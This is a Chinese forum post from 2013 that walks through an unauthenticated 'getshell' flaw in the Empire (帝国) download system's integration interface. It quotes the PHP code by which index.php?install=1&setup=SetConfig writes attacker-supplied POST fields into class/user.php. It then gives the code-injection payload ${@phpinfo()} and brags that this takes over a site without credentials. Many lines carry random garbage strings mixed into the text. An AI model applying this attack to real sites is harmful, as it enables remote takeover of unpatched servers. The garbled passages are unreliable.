这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们
3 `7 S9 F8 ]; }: b0 d$ V# Z: x2 V8 b6 J6 g! F7 _' z
" A! [4 D+ U# Q. k! H; K这是帝国的一套下载系统 如图4 E& ?9 i" B# k7 ^- g
ps(不需要任何账户和密码,直接写shell)
5 x7 K" t: g: r; e3 d0 H; N c
由于很多站是由于下载要整合discuz 等等一些论坛....
+ U$ F. C/ m0 ? - T3 n% W& N" W, Z6 ^3 z |4 v
而帝国他又有一个万能接口,如图
! H% u2 f# ~+ J2 e% a) c. s. y4 F$ I8 s$ E* x6 l( J: }% b
9 T7 G. y% L4 [' T. s8 Y1 n
而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码
3 z1 N: O! v$ @/ E8 L
3 K% Y4 D8 n- |( Y8 j/ s当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig 1. if($_GET['install']==1) 2. { 3. @include("../class/connect.php"); 4. @include("../class/db_sql.php"); 5. @include("../class/functions.php"); 6. $link=db_connect(); 7. $empire=new mysqlquery(); 8. if($setup=="SetConfig") 9. { 10. SetUserCOMConfig($_POST); 11. } 12. elseif($setup=="alter") 13. { 14. InstallUserCOM(); 15. } 16. elseif($setup=="update") 17. { 18. UpdateUserCOM(); 19. } 20. else 21. {} 复制代码 他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪/ y5 K) t+ k% K/ ?1 Y, J: w
3 D$ h- a9 ^- t n+ u
在data/fun.php中的15行% l# D3 y* e, I) ?& g
1 A3 p) B4 V! k: X; F( ]* I
我们可以看到这个函数 1. function SetUserCOMConfig($add){ 2. $filetext=ReadFiletext('data/user.php'); 3. if(empty($filetext)) 4. { 5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.'); 6. } 7. $vr=explode(",",ReturnRepUserVar()); 8. $count=count($vr); 9. for($i=0;$i<$count;$i++) 10. { 11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext); 12. } 13. //写入配置文件 14. $fp=@fopen("../class/user.php","w"); 15. if(!$fp) 16. {) t' D X S \
17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 18. } 19. @fputs($fp,$filetext); 20. @fclose($fp); 复制代码 .....//省略若干
3 O8 { b) S3 Y1 ~1 x; l* a' D# i! `) h: L; B/ N# m
这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);3 G: U9 \, B+ E# K& t# a
- o6 U* ], Q+ n, p他将传进来的变量进行了切割,然后赋给了$filetext- E( R2 e. h5 c; s
0 Z' v; s6 m' j然后看下面 1. //写入配置文件 2. $fp=@fopen("../class/user.php","w"); 3. if(!$fp) 4. { 5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 6. } 7. @fputs($fp,$filetext); 复制代码 打开了一个class/user.php文件,然后将$filetext写入了
( O; I( h; J/ l) _! s3 {2 _# N& w" h- ^/ ?6 L/ Z) l# q9 I W6 a
我们看看写入的结果,随便填一个 ) y ~# b; Q2 p0 N0 x
7 G, J3 h, ^0 ^* o/ D( \
* p4 a2 G9 c5 C3 R) X, i2 y9 h9 l5 f5 F; i& n, y
! W& ?! Z* w8 Z: F
* |; F' ]9 O2 ~) ?% g( u( G5 \. ?1 m( e4 }" A1 u" W" ?4 L
) l8 Z: A5 C4 @3 R) ?8 U5 h% X& @; \+ R8 [
: \1 e5 ?0 i# o4 N( L+ ?& R3 _8 G) D9 e6 {8 f0 k1 \
( y+ I+ |/ G3 c) y
$ y+ M1 y) I3 R( I$ F, L0 w+ G4 I0 \% b V: P: |2 i, J0 m& E
3 i0 t. ]; I) N/ y* `
% c# P( f- @ r4 x- W) m
, @- A( ~. Q6 r" Z' s i
- n. N3 J6 O2 c$ a
" _- o3 d1 ]9 @% w& k0 y
# s% @9 o! ?6 x: m. ?6 N
- P& k3 R4 d2 r, h. Z
! [: {1 h+ S; B- y) H所以我们淫荡点,写个${@phpinfo()}试试 2 p0 m) G9 U* r4 I9 d: p' {5 K7 l
然后访问以下class/user.php这个文件& a5 F! c2 V( p
日了吧
8 T& m8 A8 O! D( l" ^7 E& C* m& {+ m. ~1 q' t; E: ]3 T/ u
6 a5 j1 R# n4 t# ^
. c& A0 [6 s' T
) `! W$ I2 B* f, u0 e* P3 s6 K- m) L6 e1 H$ N$ X) v
| 
发表于 2013-1-23 09:34:37
收藏
支持
反对